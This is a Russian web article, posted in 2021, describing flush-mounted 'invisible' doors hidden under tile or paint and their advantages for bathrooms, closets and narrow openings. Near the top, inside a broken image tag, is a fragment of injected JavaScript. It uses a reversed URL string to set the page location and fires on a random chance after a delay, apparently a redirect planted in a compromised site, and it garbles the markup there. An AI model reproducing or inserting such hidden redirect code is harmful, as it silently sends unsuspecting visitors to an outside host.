Добавить в закладки

Двери-невидимки: в чем их особенности и преимущества

tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to_width_1000.jpg» alt=»» width=»692″ height=»461″ />

Распашная дверь, установленная в скрытом проеме на скрытой петле, называется дверью-невидимкой. В предлагаемой конструкции отсутствуют ламели и полотно ворот прилегает к стене. Клиенты могут выбрать изготовление дверей на месте для ремонта или заказать двери уже в готовом виде.

Красиво оформленные и установленные двери-невидимки под плитку порадуют:

Превосходное представление. Для влажных помещений с резкими перепадами температур такие покрытия становятся беспроигрышным выбором;

Уберите из поля зрения зоны, где хозяин пытается отвлечь гостей. Например, невидимые двери под плитку помогут обустроить кладовую или нишу на кухне. Их маскирующая способность очень высока. Зазоры по периферии проема визуально неотличимы от стыков между прямоугольниками плитки;

Возможность исправления пространственных дефектов. Проблема многих ванных комнат заключается в их небольших размерах и узком пространстве. Скрытая система уменьшает визуальные детали в комнате, снижает визуальную нагрузку, делает ее более просторной и теплой;

Модный внешний вид. Необычный дизайн дверей-невидимок под плитку — шаг к созданию неповторимого интерьера. Подобные решения позволяют избавиться от общепринятых стандартов проектирования и получить единое целое со своими характеристиками.

  Выгода:

Интегрируется со стеной. Где вам понадобится эффект невидимой двери — решать вам. По нашему опыту, мы бы сказали, что их часто размещают в местах, где нужно спрятать ненужные помещения внутри — гардеробные, кладовые и т. д.

Готово на месте. Преимущество в том, что вы можете сами выбрать цвет — нужный вам цвет: под стену, стандарт RAL, обои, штукатурку. Подрезаете потайную дверь под ней. Если вы заказываете отделку на фабрике дверей, то выбор цвета будет проблематичным, потому что придется выбирать из цветов, используемых на фабрике.

Компактный размер. Поскольку такая дверь не имеет реек и традиционных рам, ее можно устанавливать в узкие проемы, где важен каждый сантиметр.

Варианты нестандартных проемов. Помимо узких проемов, скрытые двери подходят еще и для широких и высоких проемов. Но есть одно «но» — чем больше отклонение от стандартного размера двери 800х2000, тем она дороже.

Реализуйте нестандартные дизайнерские схемы. Невидимые межкомнатные двери со скрытыми петлями могут стать инструментом для воплощения оригинальных идей. Например, если они покрыты подходящими материалами, они могут стать частью акцентной стены или классной доски. При желании можно даже сделать их зеркальные отражения — все зависит от идеи.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Автор: admin
Опубликовано: 27.06.2021





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: